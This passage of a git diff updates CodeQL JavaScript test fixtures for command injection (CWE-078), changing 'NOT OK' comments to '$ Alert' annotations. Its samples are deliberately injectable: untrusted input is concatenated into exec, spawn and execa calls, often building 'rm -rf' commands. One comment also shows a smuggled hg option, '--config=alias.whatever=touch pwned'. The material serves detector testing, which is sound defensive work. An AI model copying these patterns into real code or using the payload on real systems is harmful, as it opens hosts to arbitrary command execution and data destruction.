Alert }); var form2 = new multiparty.Form(); form2.on('part', function (part) { // / file / field - exec("touch " + part.filename); // NOT OK + exec("touch " + part.filename); // $ Alert }); form2.parse(req); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js index 2e86ace433ce..a606c9166175 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/CommandInjection/other.js @@ -4,32 +4,32 @@ var http = require("http"), var server = http.createServer(function (req, res) { let cmd = url.parse(req.url, true).query.path; - require("cross-spawn").sync(cmd); // NOT OK - require("execa").shell(cmd); // NOT OK - require("execa").shellSync(cmd); // NOT OK - require("execa").stdout(cmd); // NOT OK - require("execa").stderr(cmd); // NOT OK - require("execa").sync(cmd); // NOT OK - - require("cross-spawn")(cmd); // NOT OK - require("cross-spawn-async")(cmd); // NOT OK - require("exec")(cmd); // NOT OK - require("exec-async")(cmd); // NOT OK - require("execa")(cmd); // NOT OK - require("remote-exec")(target, cmd); // NOT OK + require("cross-spawn").sync(cmd); // $ Alert + require("execa").shell(cmd); // $ Alert + require("execa").shellSync(cmd); // $ Alert + require("execa").stdout(cmd); // $ Alert + require("execa").stderr(cmd); // $ Alert + require("execa").sync(cmd); // $ Alert + + require("cross-spawn")(cmd); // $ Alert + require("cross-spawn-async")(cmd); // $ Alert + require("exec")(cmd); // $ Alert + require("exec-async")(cmd); // $ Alert + require("execa")(cmd); // $ Alert + require("remote-exec")(target, cmd); // $ Alert const ssh2 = require("ssh2"); - new ssh2().exec(cmd); // NOT OK - new ssh2.Client().exec(cmd); // NOT OK + new ssh2().exec(cmd); // $ Alert + new ssh2.Client().exec(cmd); // $ Alert const SSH2Stream = require("ssh2-streams").SSH2Stream; - new SSH2Stream().exec(false, cmd); // NOT OK + new SSH2Stream().exec(false, cmd); // $ Alert - require("execa").node(cmd); // NOT OK + require("execa").node(cmd); // $ Alert - require("foreground-child")(cmd); // NOT OK + require("foreground-child")(cmd); // $ Alert const opener = require("opener"); - opener("http://github.com/" + url.parse(req.url, true).query.user); // OK - opener("http://github.com", { command: cmd }); // NOT OK + opener("http://github.com/" + url.parse(req.url, true).query.user); + opener("http://github.com", { command: cmd }); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js index 7a8f6982f178..74301997e38c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/actions.js @@ -1,14 +1,14 @@ import { exec } from "@actions/exec"; import { getInput } from "@actions/core"; -exec(process.env['TEST_DATA']); // NOT OK -exec(process.env['GITHUB_ACTION']); // OK +exec(process.env['TEST_DATA']); // $ Alert +exec(process.env['GITHUB_ACTION']); function test(e) { - exec(e['TEST_DATA']); // NOT OK - exec(e['GITHUB_ACTION']); // OK + exec(e['TEST_DATA']); // $ Alert + exec(e['GITHUB_ACTION']); } test(process.env); -exec(getInput('data')); // NOT OK +exec(getInput('data')); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js index 17b8b6c9c25e..fd1e9cdd9f97 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/IndirectCommandInjection/command-line-parameter-command-injection.js @@ -1,36 +1,36 @@ var cp = require("child_process"); (function() { - cp.exec(process.argv); // NOT OK (just weird) - cp.exec(process.argv[0]); // OK - cp.exec("cmd.sh " + process.argv[0]); // OK - cp.exec("cmd.sh " + process.argv[1]); // OK - cp.exec("cmd.sh " + process.argv[2]); // NOT OK + cp.exec(process.argv); // $ Alert - just weird + cp.exec(process.argv[0]); + cp.exec("cmd.sh " + process.argv[0]); + cp.exec("cmd.sh " + process.argv[1]); + cp.exec("cmd.sh " + process.argv[2]); // $ Alert var args = process.argv.slice(2); - cp.execSync(args[0]); // NOT OK - cp.execSync("cmd.sh " + args[0]); // NOT OK + cp.execSync(args[0]); // $ Alert + cp.execSync("cmd.sh " + args[0]); // $ Alert var fewerArgs = args.slice(1); - cp.execSync(fewerArgs[0]); // NOT OK - cp.execSync("cmd.sh " + fewerArgs[0]); // NOT OK + cp.execSync(fewerArgs[0]); // $ Alert + cp.execSync("cmd.sh " + fewerArgs[0]); // $ Alert var arg0 = fewerArgs[0]; - cp.execSync(arg0); // NOT OK - cp.execSync("cmd.sh " + arg0); // NOT OK + cp.execSync(arg0); // $ Alert + cp.execSync("cmd.sh " + arg0); // $ Alert }); (function() { const args = process.argv.slice(2); const script = path.join(packageDir, 'app', 'index.js'); - cp.execSync(`node ${script} ${args[0]} --option"`); // NOT OK - cp.execSync(`node ${script} ${args.join(' ')} --option"`); // NOT OK + cp.execSync(`node ${script} ${args[0]} --option"`); // $ Alert + cp.execSync(`node ${script} ${args.join(' ')} --option"`); // $ Alert }); -cp.exec("cmd.sh " + require("get-them-args")().foo); // NOT OK +cp.exec("cmd.sh " + require("get-them-args")().foo); // $ Alert cp.exec("cmd.sh " + require("minimist")().foo); // OK - no args provided. -cp.exec("cmd.sh " + require("yargs").argv.foo); // NOT OK -cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK +cp.exec("cmd.sh " + require("yargs").argv.foo); // $ Alert +cp.exec("cmd.sh " + require("optimist").argv.foo); // $ Alert (function () { var args = require('yargs') // eslint-disable-line @@ -38,9 +38,9 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK .option('verbose', { foo: "bar" }) .argv - cp.exec("cmd.sh " + args); // NOT OK + cp.exec("cmd.sh " + args); // $ Alert - cp.exec("cmd.sh " + require("yargs").array("foo").parse().foo); // NOT OK + cp.exec("cmd.sh " + require("yargs").array("foo").parse().foo); // $ Alert }); (function () { @@ -52,7 +52,7 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK .usage('Usage: foo bar') .command(); - cp.exec("cmd.sh " + args); // NOT OK + cp.exec("cmd.sh " + args); // $ Alert var tainted1 = require('yargs').argv; var tainted2 = require('yargs').parse() @@ -62,34 +62,34 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK taint2: tainted2 } - cp.exec("cmd.sh " + taint1rest); // NOT OK - has flow from tainted1 - cp.exec("cmd.sh " + taint2rest); // NOT OK - has flow from tianted2 + cp.exec("cmd.sh " + taint1rest); // $ Alert - has flow from tainted1 + cp.exec("cmd.sh " + taint2rest); // $ Alert - has flow from tianted2 var {...taint3} = require('yargs').argv; - cp.exec("cmd.sh " + taint3); // NOT OK + cp.exec("cmd.sh " + taint3); // $ Alert var [...taint4] = require('yargs').argv; - cp.exec("cmd.sh " + taint4); // NOT OK + cp.exec("cmd.sh " + taint4); // $ Alert }); (function () { const argv = process.argv.slice(2); var minimist = require("minimist"); - cp.exec("cmd.sh " + minimist(argv).foo); // NOT OK + cp.exec("cmd.sh " + minimist(argv).foo); // $ Alert var subarg = require('subarg'); - cp.exec("cmd.sh " + subarg(process.argv.slice(2)).foo); // NOT OK + cp.exec("cmd.sh " + subarg(process.argv.slice(2)).foo); // $ Alert var yargsParser = require('yargs-parser'); - cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // NOT OK + cp.exec("cmd.sh " + yargsParser(process.argv.slice(2)).foo); // $ Alert import args from 'args' var flags = args.parse(process.argv); - cp.exec("cmd.sh " + flags.foo); // NOT OK + cp.exec("cmd.sh " + flags.foo); // $ Alert var flags = require('arg')({...spec}); - cp.exec("cmd.sh " + flags.foo); // NOT OK + cp.exec("cmd.sh " + flags.foo); // $ Alert }) (function () { @@ -99,13 +99,13 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK parser.add_argument('-f', '--foo', { help: 'foo bar' }); - cp.exec("cmd.sh " + parser.parse_args().foo); // NOT OK + cp.exec("cmd.sh " + parser.parse_args().foo); // $ Alert }); (function () { const commandLineArgs = require('command-line-args'); const options = commandLineArgs(optionDefinitions); - cp.exec("cmd.sh " + options.foo); // NOT OK + cp.exec("cmd.sh " + options.foo); // $ Alert }); (function () { @@ -113,7 +113,7 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK const cli = meow(`helpstring`, {flags: {...flags}}); - cp.exec("cmd.sh " + cli.input[0]); // NOT OK + cp.exec("cmd.sh " + cli.input[0]); // $ Alert }); (function () { @@ -121,20 +121,20 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK var opts = dashdash.parse({options: options}); - cp.exec("cmd.sh " + opts.foo); // NOT OK + cp.exec("cmd.sh " + opts.foo); // $ Alert var parser = dashdash.createParser({options: options}); var opts = parser.parse(); - cp.exec("cmd.sh " + opts.foo); // NOT OK + cp.exec("cmd.sh " + opts.foo); // $ Alert }); (function () { const { program } = require('commander'); program.version('0.0.1'); - cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK - cp.exec("cmd.sh " + program.pizzaType); // NOT OK + cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert + cp.exec("cmd.sh " + program.pizzaType); // $ Alert }); (function () { @@ -142,8 +142,8 @@ cp.exec("cmd.sh " + require("optimist").argv.foo); // NOT OK const program = new Command(); program.version('0.0.1'); - cp.exec("cmd.sh " + program.opts().pizzaType); // NOT OK - cp.exec("cmd.sh " + program.pizzaType); // NOT OK + cp.exec("cmd.sh " + program.opts().pizzaType); // $ Alert + cp.exec("cmd.sh " + program.pizzaType); // $ Alert - cp.execFile(program.opts().pizzaType, ["foo", "bar"]); // OK + cp.execFile(program.opts().pizzaType, ["foo", "bar"]); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js index f68093d24053..16ace6a020f6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/SecondOrderCommandInjection/second-order.js @@ -4,18 +4,18 @@ const { execFile } = require("child_process"); app.get("/", (req, res) => { const remote = req.query.remote; - execFile("git", ["ls-remote", remote]); // NOT OK + execFile("git", ["ls-remote", remote]); // $ Alert - execFile("git", ["fetch", remote]); // NOT OK + execFile("git", ["fetch", remote]); // $ Alert - indirect("git", ["ls-remote", remote]); // NOT OK + indirect("git", ["ls-remote", remote]); // $ Alert const myArgs = req.query.args; - execFile("git", myArgs); // NOT OK + execFile("git", myArgs); // $ Alert if (remote.startsWith("--")) { - execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it is very explicit that options that allowed here. + execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it is very explicit that options that allowed here. } else { execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's not an option } @@ -23,10 +23,10 @@ app.get("/", (req, res) => { if (remote.startsWith("git@")) { execFile("git", ["ls-remote", remote, "HEAD"]); // OK - it's a git URL } else { - execFile("git", ["ls-remote", remote, "HEAD"]); // NOT OK - unknown starting string + execFile("git", ["ls-remote", remote, "HEAD"]); // $ Alert - unknown starting string } - execFile("git", req.query.args); // NOT OK - unknown args + execFile("git", req.query.args); // $ Alert - unknown args execFile("git", ["add", req.query.args]); // OK - git add is not a command that can be used to execute arbitrary code @@ -34,16 +34,16 @@ app.get("/", (req, res) => { execFile("git", ["ls-remote", req.query.remote].concat(req.query.otherArgs)); // NOT OK - but not found [INCONSISTENCY]. It's hard to track through concat. - execFile("git", ["add", "fpp"].concat(req.query.notVulnerable)); // OK + execFile("git", ["add", "fpp"].concat(req.query.notVulnerable)); // hg - execFile("hg", ["clone", req.query.remote]); // NOT OK + execFile("hg", ["clone", req.query.remote]); // $ Alert - execFile("hg", ["whatever", req.query.remote]); // NOT OK - `--config=alias.whatever=touch pwned` + execFile("hg", ["whatever", req.query.remote]); // $ Alert - `--config=alias.whatever=touch pwned` - execFile("hg", req.query.args); // NOT OK - unknown args + execFile("hg", req.query.args); // $ Alert - unknown args - execFile("hg", ["clone", "--", req.query.remote]); // OK + execFile("hg", ["clone", "--", req.query.remote]); }); function indirect(cmd, args) { diff --git a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js index 0d610b1e9dd3..0a0edcbd25c7 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js @@ -2,12 +2,12 @@ var cp = require('child_process'), path = require('path'), execa = require("execa"); (function() { - cp.execFileSync('rm', ['-rf', path.join(__dirname, "temp")]); // GOOD - cp.execSync('rm -rf ' + path.join(__dirname, "temp")); // BAD + cp.execFileSync('rm', ['-rf', path.join(__dirname, "temp")]); + cp.execSync('rm -rf ' + path.join(__dirname, "temp")); // $ Alert - execa.shell('rm -rf ' + path.join(__dirname, "temp")); // NOT OK - execa.shellSync('rm -rf ' + path.join(__dirname, "temp")); // NOT OK + execa.shell('rm -rf ' + path.join(__dirname, "temp")); // $ Alert + execa.shellSync('rm -rf ' + path.join(__dirname, "temp")); // $ Alert const safe = "\"" + path.join(__dirname, "temp") + "\""; - execa.shellSync('rm -rf ' + safe); // OK + execa.shellSync('rm -rf ' + safe); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js index 116b624615b1..5b58e1afe4f2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/isImported.js @@ -3,5 +3,5 @@ const cp = require("child_process"); module.exports.thisMethodIsImported = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js index 75fda0090000..c7e35029966b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js +++ b/javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js @@ -1,30 +1,30 @@ var cp = require("child_process") module.exports = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert - cp.execFile(name, [name]); // OK - cp.execFile(name, name); // OK + cp.execFile(name, [name]); + cp.execFile(name, name); }; module.exports.foo = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } module.exports.foo.bar = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } function cla() { } cla.prototype.method = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } module.exports = new cla(); function cla2() { } cla2.prototype.method = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } module.exports.bla = new cla2(); @@ -32,29 +32,29 @@ module.exports.lib2 = require("./lib2.js") class Cla3 { constructor(name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } static foo(name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } bar(name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert - cp.exec("rm -rf " + notASource); // OK + cp.exec("rm -rf " + notASource); } } module.exports.cla3 = Cla3; module.exports.mz = function (name) { - require("mz/child_process").exec("rm -rf " + name); // NOT OK. + require("mz/child_process").exec("rm -rf " + name); // $ Alert } module.exports.flow = function (name) { - var cmd1 = "rm -rf " + name; // NOT OK. + var cmd1 = "rm -rf " + name; // $ Alert cp.exec(cmd1); - var cmd2 = "rm -rf " + name; // NOT OK. + var cmd2 = "rm -rf " + name; // $ Alert function myExec(cmd) { cp.exec(cmd); } @@ -62,73 +62,73 @@ module.exports.flow = function (name) { } module.exports.stringConcat = function (name) { - cp.exec("rm -rf " + name); // NOT OK. + cp.exec("rm -rf " + name); // $ Alert - cp.exec(name); // OK. + cp.exec(name); - cp.exec("for foo in (" + name + ") do bla end"); // NOT OK. + cp.exec("for foo in (" + name + ") do bla end"); // $ Alert - cp.exec("cat /foO/BAR/" + name) // NOT OK. + cp.exec("cat /foO/BAR/" + name) // $ Alert - cp.exec("cat \"" + name + "\"") // NOT OK. + cp.exec("cat \"" + name + "\"") // $ Alert - cp.exec("cat '" + name + "'") // NOT OK. + cp.exec("cat '" + name + "'") // $ Alert - cp.exec("cat '/foo/bar" + name + "'") // NOT OK. + cp.exec("cat '/foo/bar" + name + "'") // $ Alert - cp.exec(name + " some file") // OK. + cp.exec(name + " some file") } module.exports.arrays = function (name) { - cp.exec("rm -rf " + name); // NOT OK. + cp.exec("rm -rf " + name); // $ Alert var args1 = ["node"]; - args1.push(name); // NOT OK. + args1.push(name); // $ Alert cp.exec(args1.join(" ")); - cp.exec(["rm -rf", name].join(" ")); // NOT OK. + cp.exec(["rm -rf", name].join(" ")); // $ Alert - cp.exec(["rm -rf", "\"" + name + "\""].join(" ")); // NOT OK. + cp.exec(["rm -rf", "\"" + name + "\""].join(" ")); // $ Alert - cp.execFile("rm", ["-rf", name]); // OK + cp.execFile("rm", ["-rf", name]); } var util = require("util"); module.exports.format = function (name) { - cp.exec(util.format("rm -rf %s", name)); // NOT OK + cp.exec(util.format("rm -rf %s", name)); // $ Alert - cp.exec(util.format("rm -rf '%s'", name)); // NOT OK + cp.exec(util.format("rm -rf '%s'", name)); // $ Alert - cp.exec(util.format("rm -rf '/foo/bar/%s'", name)); // NOT OK + cp.exec(util.format("rm -rf '/foo/bar/%s'", name)); // $ Alert - cp.exec(util.format("%s foo/bar", name)); // OK + cp.exec(util.format("%s foo/bar", name)); - cp.exec(util.format("for foo in (%s) do bar end", name)); // OK + cp.exec(util.format("for foo in (%s) do bar end", name)); - cp.exec(require("printf")('rm -rf %s', name)); // NOT OK + cp.exec(require("printf")('rm -rf %s', name)); // $ Alert } module.exports.valid = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!isValidName(name)) { return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } module.exports.safe = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!isSafeName(name)) { return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } class Cla4 { wha(name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } static bla(name) { @@ -146,7 +146,7 @@ function Cla5(name) { module.exports.cla5 = new Cla5(); module.exports.indirect = function (name) { - let cmd = "rm -rf " + name; // NOT OK + let cmd = "rm -rf " + name; // $ Alert let sh = "sh"; let args = ["-c", cmd]; cp.spawn(sh, args, cb); @@ -156,7 +156,7 @@ module.exports.indirect2 = function (name) { let cmd = name; let sh = "sh"; let args = ["-c", cmd]; - cp.spawn(sh, args, cb); // OK + cp.spawn(sh, args, cb); let cmd2 = "rm -rf " + name; var args2 = [cmd2]; @@ -168,64 +168,64 @@ module.exports.indirect2 = function (name) { } module.exports.cmd = function (command, name) { - cp.exec("fo | " + command); // OK + cp.exec("fo | " + command); - cp.exec("fo | " + name); // NOT OK + cp.exec("fo | " + name); // $ Alert } module.exports.sanitizer = function (name) { var sanitized = "'" + name.replace(/'/g, "'\\''") + "'" - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); var broken = "'" + name.replace(/'/g, "'\''") + "'" - cp.exec("rm -rf " + broken); // NOT OK + cp.exec("rm -rf " + broken); // $ Alert } var path = require("path"); module.exports.guard = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!path.exist(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert return; } - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } module.exports.blacklistOfChars = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (/[^A-Za-z0-9_\/:=-]/.test(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } } module.exports.whitelistOfChars = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (/^[A-Za-z0-9_\/:=-]$/.test(name)) { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } } module.exports.blackList2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!/^([a-zA-Z0-9]+))?$/.test(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert process.exit(-1); } - cp.exec("rm -rf " + name); // OK - but FP due to tracking flow through `process.exit()`. [INCONSISTENCY] + cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to tracking flow through `process.exit()`. } module.exports.accessSync = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert try { path.accessSync(name); @@ -233,7 +233,7 @@ module.exports.accessSync = function (name) { return; } - cp.exec("rm -rf " + name); // OK - but FP due to `path.accessSync` not being recognized as a sanitizer. [INCONSISTENCY] + cp.exec("rm -rf " + name); // $ SPURIOUS: Alert - FP due to `path.accessSync` not being recognized as a sanitizer. } var cleanInput = function (s) { @@ -246,39 +246,39 @@ var cleanInput = function (s) { } module.exports.goodSanitizer = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert var cleaned = cleanInput(name); - cp.exec("rm -rf " + cleaned); // OK - But FP due to SanitizingRegExpTest not being able to generate a barrier edge for an edge into a phi node. + cp.exec("rm -rf " + cleaned); // $ SPURIOUS: Alert - SanitizingRegExpTest is not able to generate a barrier edge for an edge into a phi node. } var fs = require("fs"); module.exports.guard2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (!fs.existsSync("prefix/" + name)) { - cp.exec("rm -rf prefix/" + name); // NOT OK + cp.exec("rm -rf prefix/" + name); // $ Alert return; } - cp.exec("rm -rf prefix/" + name); // OK + cp.exec("rm -rf prefix/" + name); } module.exports.sanitizerProperty = function (obj) { - cp.exec("rm -rf " + obj.version); // NOT OK + cp.exec("rm -rf " + obj.version); // $ Alert obj.version = ""; - cp.exec("rm -rf " + obj.version); // OK + cp.exec("rm -rf " + obj.version); } module.exports.Foo = class Foo { start(opts) { - cp.exec("rm -rf " + opts.bla); // NOT OK + cp.exec("rm -rf " + opts.bla); // $ Alert this.opts = {}; this.opts.bla = opts.bla - cp.exec("rm -rf " + this.opts.bla); // NOT OK + cp.exec("rm -rf " + this.opts.bla); // $ Alert } } @@ -305,24 +305,24 @@ function sanitizeShellString(str) { } module.exports.sanitizer2 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert var sanitized = sanitizeShellString(name); - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); } module.exports.typeofcheck = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (typeof name === "undefined") { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } } module.exports.typeofcheck = function (arg) { - var cmd = "MyWindowCommand | findstr /i /c:" + arg; // NOT OK + var cmd = "MyWindowCommand | findstr /i /c:" + arg; // $ Alert cp.exec(cmd); } @@ -333,22 +333,22 @@ function id(x) { module.exports.id = id; module.exports.unproblematic = function() { - cp.exec("rm -rf " + id("test")); // OK + cp.exec("rm -rf " + id("test")); }; module.exports.problematic = function(n) { - cp.exec("rm -rf " + id(n)); // NOT OK + cp.exec("rm -rf " + id(n)); // $ Alert }; module.exports.typeofNumber = function(n) { if (typeof n === "number") { - cp.exec("rm -rf " + n); // OK + cp.exec("rm -rf " + n); } }; function boundProblem(safe, unsafe) { - cp.exec("rm -rf " + safe); // OK - cp.exec("rm -rf " + unsafe); // NOT OK + cp.exec("rm -rf " + safe); + cp.exec("rm -rf " + unsafe); // $ Alert } Object.defineProperty(module.exports, "boundProblem", { @@ -363,7 +363,7 @@ function MyTrainer(opts) { MyTrainer.prototype = { train: function() { - var command = "learn " + this.learn_args + " " + model; // NOT OK + var command = "learn " + this.learn_args + " " + model; // $ Alert cp.exec(command); } }; @@ -403,27 +403,27 @@ function yetAnohterSanitizer(str) { } module.exports.sanitizer3 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert var sanitized = yetAnohterSanitizer(name); - cp.exec("rm -rf " + sanitized); // OK + cp.exec("rm -rf " + sanitized); } const cp = require("child_process"); const spawn = cp.spawn; module.exports.shellOption = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert - cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // NOT OK - cp.spawn("rm", ["-rf", name], {shell: true}); // NOT OK - cp.execFileSync("rm", ["-rf", name], {shell: true}); // NOT OK - cp.spawnSync("rm", ["-rf", name], {shell: true}); // NOT OK + cp.execFile("rm", ["-rf", name], {shell: true}, (err, out) => {}); // $ Alert + cp.spawn("rm", ["-rf", name], {shell: true}); // $ Alert + cp.execFileSync("rm", ["-rf", name], {shell: true}); // $ Alert + cp.spawnSync("rm", ["-rf", name], {shell: true}); // $ Alert const SPAWN_OPT = {shell: true}; - spawn("rm", ["first", name], SPAWN_OPT); // NOT OK + spawn("rm", ["first", name], SPAWN_OPT); // $ Alert var arr = []; - arr.push(name); // NOT OK + arr.push(name); // $ Alert spawn("rm", arr, SPAWN_OPT); spawn("rm", build("node", (name ? name + ':' : '') + '-'), SPAWN_OPT); // This is bad, but the alert location is down in `build`. } @@ -433,18 +433,18 @@ function build(first, last) { if (something() === 'gm') arr.push('convert'); first && arr.push(first); - last && arr.push(last); // NOT OK + last && arr.push(last); // $ Alert return arr; }; var asyncExec = require("async-execute"); module.exports.asyncStuff = function (name) { - asyncExec("rm -rf " + name); // NOT OK + asyncExec("rm -rf " + name); // $ Alert } const myFuncs = { myFunc: function (name) { - asyncExec("rm -rf " + name); // NOT OK + asyncExec("rm -rf " + name); // $ Alert } }; @@ -475,12 +475,12 @@ const {promisify} = require('util'); const exec = promisify(require('child_process').exec); module.exports = function check(config) { - const cmd = path.join(config.installedPath, 'myBinary -v'); // NOT OK + const cmd = path.join(config.installedPath, 'myBinary -v'); // $ Alert return exec(cmd); } module.exports.splitConcat = function (name) { - let args = ' my name is ' + name; // NOT OK + let args = ' my name is ' + name; // $ Alert let cmd = 'echo'; cp.exec(cmd + args); } @@ -496,7 +496,7 @@ module.exports.myCommand = function (myCommand) { }; module.exports.myIndirectThing = function (name) { - MyThing.cp.exec("rm -rf " + name); // NOT OK + MyThing.cp.exec("rm -rf " + name); // $ Alert } }); @@ -507,49 +507,49 @@ for (var name in imp){ } module.exports.sanitizer4 = function (name) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert if (isNaN(name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(parseInt(name))) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(+name)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(parseInt(name, 10))) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(name - 0)) { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // OK + cp.exec("rm -rf " + name); } if (isNaN(name | 0)) { // <- not a sanitizer - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } else { - cp.exec("rm -rf " + name); // NOT OK + cp.exec("rm -rf " + name); // $ Alert } } module.exports.shellThing = function (name) { function indirectShell(cmd, args, spawnOpts) { - cp.spawn(cmd, args, spawnOpts); // NOT OK + cp.spawn(cmd, args, spawnOpts); // $ Alert } indirectShell("rm", ["-rf", name], {shell: true}); @@ -557,40 +557,40 @@ module.exports.shellThing = function (name) { module.exports.badSanitizer = function (name) { if (!name.match(/^(.|\.){1,64}$/)) { // <- bad sanitizer - exec("rm -rf " + name); // NOT OK + 